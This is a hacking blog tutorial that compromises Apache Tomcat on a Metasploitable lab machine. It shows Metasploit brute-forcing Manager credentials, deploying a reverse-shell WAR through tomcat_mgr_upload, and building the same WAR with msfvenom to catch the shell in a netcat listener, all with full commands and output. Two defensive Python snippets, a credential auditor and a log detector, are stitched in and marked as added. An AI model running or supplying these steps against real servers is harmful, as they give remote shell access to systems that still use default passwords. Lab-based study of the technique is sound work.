Let's hack😈 some Apache Tomcats😎 with Netcat

CyberMorans

Web management interfaces✊, especially those that have upload functionality, should be carefully examined for vulnerabilities☠. If a weakness is found in Apache Tomcat, a hacker may be able to use it to upload a backdoor and gain access to the system. It is important to thoroughly check these interfaces to ensure the security of the managed applications😎

Apache Tomcat is an open-source implementation of several Java technologies, including Java Servlet, JSP, Java EL, and WebSocket. It provides an environment where Java code can run over HTTP. Today, we will hack one! 😈

Tomcat uses WAR (Web Application Archive) files to deploy web apps via servlets. These files are similar to JAR files but contain everything the web app needs, such as JavaScript, CSS, etc. Previous versions of Apache Tomcat included a vulnerability that allowed attackers to upload and deploy a WAR backdoor☠


To demonstrate the vulnerability of Apache Tomcat, we use Kali Linux to perform an attack on an instance of Metasploitable 2, which is a virtual machine that has been intentionally configured🧐 with security vulnerabilities. The purpose of this exercise is to illustrate the potential risks associated with Tomcat vulnerabilities☠


Morans, let's do this...✊


 

🚀 Enumeration

The first step☝, obviously, is to perform an Nmap scan on the target to verify that Apache Tomcat is up and running. The -sV switch will attempt to determine the name and version of any available service👇

~# nmap -sV 10.10.0.50

Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-06 11:33 CDT
Nmap scan report for 10.10.0.50
Host is up (0.0032s latency)
Not shown: 977 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 2.3.4
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet?
25/tcp   open  smtp?
53/tcp   open  domain?
80/tcp   open  tcpwrapped
111/tcp  open  rpcbind?
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds?
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
1099/tcp open  rmiregistry?
1524/tcp open  bindshell     Metasploitable root shell
2049/tcp open  nfs?
2121/tcp open  ccproxy-ftp?
3306/tcp open  mysql?
5432/tcp open  postgresql?
5900/tcp open  vnc           VNC (protocol 3.3)
6000/tcp open  X11?
6667/tcp open  irc           UnrealIRCd
8009/tcp open  ajp13?
8180/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:1D:09:55:B1:3B (Dell)
Service Info: Host: irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We can see that Tomcat is indeed running on HTTP port 8180 😋

Next, for this exploit to work, we need a valid set of credentials. Metasploit has an auxiliary scanner that will attempt to 🚀 brute-force Tomcat's Manager application 😜

Launch Metasploit with msfconsole in the terminal👇

~# msfconsole

[-] Starting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 2246 exploits - 1265 auxiliary - 430 post       ]
+ -- --=[ 840 payloads - 62 encoders - 12 nops            ]
+ -- --=[ 3 evasion                                       ]

msf5 >

Use the search command to find modules for Apache Tomcat👇

msf5 > search tomcat

Matching Modules
================

   #   Name                                                         Disclosure Date  Rank       Check  Description
   -   ----                                                         ---------------  ----       -----  -----------
   0   auxiliary/admin/http/tomcat_administration                                    normal     Yes    Tomcat Administration Tool Default Access
   1   auxiliary/admin/http/tomcat_utf8_traversal                   2009-01-09       normal     Yes    Tomcat UTF-8 Directory Traversal Vulnerability
   2   auxiliary/admin/http/trendmicro_dlp_traversal                2009-01-09       normal     Yes    TrendMicro Data Loss Prevention 5.5 Directory Traversal
   3   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
   4   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   5   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     No     Hashtable Collisions
   6   auxiliary/scanner/http/tomcat_enum                                            normal     Yes    Apache Tomcat User Enumeration
   7   auxiliary/scanner/http/tomcat_mgr_login                                       normal     Yes    Tomcat Application Manager Login Utility
   8   exploit/linux/http/cisco_prime_inf_rce                       2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   9   exploit/linux/http/cpi_tararchive_upload                     2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   10  exploit/multi/http/struts2_namespace_ognl                    2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   11  exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   12  exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   13  exploit/multi/http/tomcat_jsp_upload_bypass                  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
   14  exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   15  exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   16  exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   17  exploit/windows/http/tomcat_cgi_cmdlineargs                  2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   18  post/multi/gather/tomcat_gather                                               normal     No     Gather Tomcat Credentials
   19  post/windows/gather/enum_tomcat                                               normal     No     Windows Gather Apache Tomcat Enumeration

We will be using the tomcat_mgr_login module. Load it with the use command👇

msf5 > use auxiliary/scanner/http/tomcat_mgr_login

or

msf5 > use 7

Now we can take a look at the options to see the available settings👇

msf5 auxiliary(scanner/http/tomcat_mgr_login) > options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   ....

First, set the rhosts option to the IP address of our target👇

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

And since Tomcat is running on port 8180, set the rport as well👇

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180

rport => 8180

Type run to start the attack👇

msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 10.10.0.50:8180 - Login Successful: tomcat:tomcat
[-] 10.10.0.50:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can see it attempt to log in using various combinations of default usernames and passwords. It looks like one login was successful, with the username and password both being tomcat😜


If we had set STOP_ON_SUCCESS to true, it would have terminated the operation after a successful login.
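The scan only succeeds because a Manager account still uses one of the default pairs in that wordlist. From the defender's side, the same weakness can be found by auditing tomcat-users.xml directly. The following is an added example, not part of the original post: the XML is a constructed sample, and the password set is the one visible in the scanner output above.

```python
import xml.etree.ElementTree as ET

# Passwords the scanner output above cycled through for the common accounts.
GUESSABLE = {"admin", "manager", "role1", "root", "tomcat", "s3cret", "vagrant"}
# Roles that allow deploying applications through the Manager app.
DEPLOY_ROLES = {"manager", "manager-gui", "manager-script"}

# Constructed sample file, not taken from a real host.
SAMPLE_USERS_XML = """<tomcat-users>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="deployer" password="s3cret" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="role1"/>
  <user username="ops" password="Qm7-constructed-long-passphrase" roles="manager-gui"/>
</tomcat-users>
"""


def local(tag):
    """Strip an XML namespace, which newer tomcat-users.xml files declare."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, roles, reason) for deploy-capable accounts with weak passwords."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        # Older files may use "name" instead of "username".
        name = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",")}
        granted = sorted(roles & DEPLOY_ROLES)
        if not granted:
            continue  # account cannot deploy WAR files through the Manager
        if not password:
            reason = "empty password"
        elif password.lower() == name.lower():
            reason = "password equals username"
        elif password.lower() in GUESSABLE:
            reason = "password is in the default wordlist"
        else:
            continue
        findings.append((name, granted, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_USERS_XML):
        print(finding)
```

Accounts flagged here should get a unique password or lose the Manager role.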

 

🚀 Get a Shell with Metasploit

Now that we have a valid set of credentials, we can exploit the vulnerability in Tomcat's Manager application. Back in our search results, locate the tomcat_mgr_upload exploit module, and load it with the use command👇

msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload

or

msf5 auxiliary(scanner/http/tomcat_mgr_login) > use 15

Then, take a look at the current settings👇

msf5 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target address range or CIDR identifier
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

We will want to set the rhosts option👇

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

And the correct rport 👇

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8180

rport => 8180

We can also set the username 👇

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat

HttpUsername => tomcat

And the password 👇

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat

HttpPassword => tomcat

To view the available payloads, use the show command👇

msf5 exploit(multi/http/tomcat_mgr_upload) > show payloads

Compatible Payloads
===================

   #   Name                             Disclosure Date  Rank    Check  Description
   -   ----                             ---------------  ----    -----  -----------
   0   generic/custom                                    normal  No     Custom Payload
   1   generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   13  multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)

The java/shell_reverse_tcp payload will work in this case. Use the set command to set it as the current payload 👇

msf5 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp

or

msf5 exploit(multi/http/tomcat_mgr_upload) > set payload 11

payload => java/shell_reverse_tcp

Since we are using a reverse shell, we specify our local machine's IP address👇

msf5 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.0.1

lhost => 10.10.0.1

And any local port 👇

msf5 exploit(multi/http/tomcat_mgr_upload) > set lport 4321

lport => 4321

We are good to go at this point. Simply type run to start the exploit 👇

msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.0.1:4321
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying LUMzvVZI0wSUrt...
[*] Executing LUMzvVZI0wSUrt...
[*] Command shell session 1 opened (10.10.0.1:4321 -> 10.10.0.50:44738) at 2020-01-06 11:59:06 -0500
[*] Undeploying LUMzvVZI0wSUrt ...

We see that a session was successfully opened. We now have a basic command shell and can run commands like id and uname -a and others to verify we have compromised the target 👇

~# id

uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

~# uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
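Both the login scan and the module's "Uploading and deploying / Executing / Undeploying" sequence leave a recognizable trail in Tomcat's access log. The following is an added detection example, not part of the original post: the log lines are constructed, the format assumed is the AccessLogValve "common" pattern, and the threshold and time window are assumed tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
FAIL_THRESHOLD = 5                     # assumed tuning value
CHURN_WINDOW = timedelta(seconds=60)   # assumed tuning value

# Constructed sample log, modelled on the lab addresses used in this post.
SAMPLE = [
    f'10.10.0.1 - - [06/Jan/2020:11:40:0{i} -0500] "GET /manager/html HTTP/1.1" 401 954'
    for i in range(6)
] + [
    '10.10.0.1 - tomcat [06/Jan/2020:11:40:07 -0500] "GET /manager/html HTTP/1.1" 200 13123',
    '10.10.0.1 - tomcat [06/Jan/2020:11:59:05 -0500] "POST /manager/html/upload HTTP/1.1" 200 14010',
    '10.10.0.1 - - [06/Jan/2020:11:59:06 -0500] "GET /examplectx/ HTTP/1.1" 200 0',
    '10.10.0.1 - tomcat [06/Jan/2020:11:59:07 -0500] "GET /manager/undeploy?path=/examplectx HTTP/1.1" 200 60',
    '10.10.0.7 - ops [06/Jan/2020:12:05:00 -0500] "GET /manager/html HTTP/1.1" 200 13123',
]


def detect(lines):
    """Return (kind, source_ip, detail) alerts for Manager-app abuse."""
    alerts = []
    failures = defaultdict(int)   # ip -> 401s on /manager since last login
    last_upload = {}              # ip -> time of the last WAR upload
    for line in lines:
        m = LINE.match(line)
        if not m or not m["path"].startswith("/manager"):
            continue
        ip, status = m["ip"], int(m["status"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]
        if status == 401:
            failures[ip] += 1
            continue
        if status == 200 and m["user"] != "-":
            # A login that follows a burst of failures: guessed credentials.
            if failures[ip] >= FAIL_THRESHOLD:
                detail = f"{failures[ip]} failures, then login as {m['user']}"
                alerts.append(("guessing_then_login", ip, detail))
            failures[ip] = 0
        if m["method"] == "POST" and path.endswith("/upload") and status == 200:
            last_upload[ip] = ts
            alerts.append(("war_upload", ip, path))
        elif path.endswith("/undeploy") and ip in last_upload:
            # Deploy followed by undeploy within seconds is not normal admin work.
            if ts - last_upload[ip] <= CHURN_WINDOW:
                alerts.append(("deploy_then_undeploy", ip, m["path"]))
            del last_upload[ip]
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

A manual deployment through the browser produces the same upload request, so the war_upload alert covers both routes described in this post.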
 

🚀 Backdoor WAR File

Using Metasploit is easy, but it's not the only way to perform this exploit. We can upload a malicious WAR file manually to get a better idea of what's going on under the hood. To begin, we can use msfvenom to create our backdoor WAR file 👇

~# msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o hacked.war

Payload size: 13395 bytes
Final size of war file: 13395 bytes
Saved as: hacked.war

In the above command 👆:

  • 👉 the -p flag specifies the payload,

  • 👉 lhost is the IP address of our local machine,

  • 👉 lport is the listening port on our machine,

  • 👉 the -f flag specifies the desired format,

  • 👉 and the -o flag is the name of the output file.

Next, we need to log into Apache Tomcat. In the browser, go to the IP address of the target on port 8180, and we should see the Apache Tomcat welcome page 👇

Next, click on the "Tomcat Manager" link, and we should be presented with an authentication form where we can log in using the default credentials we found earlier 👇

Scroll down to the "Deploy" section, and browse to the WAR file we just created with msfvenom 👇

Hit the "Deploy" button, and you should be brought back to the top of the page. Now, all we have to do is click on the file we just deployed and our payload will run.


But first, we need to set up a listener on our local machine. Netcat is always a good choice; just be sure to use the same port we specified earlier with msfvenom 👇

~# nc -lvnp 4321

listening on [any] 4321 ...

Finally, back in the Manager application, locate the name of the file we deployed and click on it 👇

You should see a connection open on our Netcat listener 👇

connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 43521

And again, we can issue commands like id and uname -a to verify we have pwned the target, and now have a shell as the tomcat55 user 👇

~# id

uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

~# uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Wed Dec 14 13:12:00 UTC 2015 i686 GNU/Linux

From this point on, you would be attempting to escalate privileges to take over the system as root, or to exfiltrate data.

 

🚀 Conclusion

Subscribe to receive notifications of similar posts 😜 where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...😋


Follow me on Twitter for daily Infosec Memes and shenanigans😝


Morans,

Stay safe and dangerous


Thank you for taking the time, and I hope you learned something new. Like and leave a comment/review and, as always, stay awesome! 😋👊
